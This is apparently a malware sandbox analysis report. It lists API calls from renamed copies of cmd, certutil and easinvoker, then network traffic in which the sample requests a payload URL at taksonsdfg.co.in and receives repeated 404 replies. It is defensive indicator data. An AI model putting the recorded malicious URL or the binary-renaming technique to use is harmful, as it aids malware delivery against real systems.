      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0835FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF7E0835FA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF7E0895FF0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF7E07C5FE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895F20 CryptDecodeObjectEx,6_2_00007FF7E0895F20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0805F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF7E0805F54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF7E07CFF64
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0839F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF7E0839F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF7E07C60DA
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF7E085E044
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0804070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF7E0804070
      Source: unknown HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF793752978
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF793741560
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF793752978
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF793741560
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF7E087234C
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF7E080C6F8
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF7E0876F80
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E08710C4
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E0873100
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF7E081B3D8
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF7E081D4A4
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07DD440
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF7E0853674
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7E08719F8
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF7E0871B04
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF7E081DBC0
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF7E0815E58
      Source: C:\Users\Public\Libraries\Host.COM Code function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02DF5908
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF793752978
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF793741560
      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF793752978
      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF793741560

      Networking

      Source: Malware configuration extractor URLs: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx
      Source: C:\Users\Public\Libraries\Host.COM Code function: 9_2_02E0E4B4 InternetCheckConnectionA,9_2_02E0E4B4
      Source: Joe Sandbox View IP Address: 108.170.55.202 108.170.55.202
      Source: Joe Sandbox View ASN Name: SSASN2US SSASN2US
      Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global traffic HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic DNS traffic detected: DNS query: taksonsdfg.co.in
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 14 Oct 2024 02:29:19 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:47 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:48 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:49 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:51 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:52 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:53 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:54 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:55 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:56 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:59 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:01 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:03 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:04 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:06 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:08 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:09 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:11 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:12 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:13 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:14 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:15 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:17 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
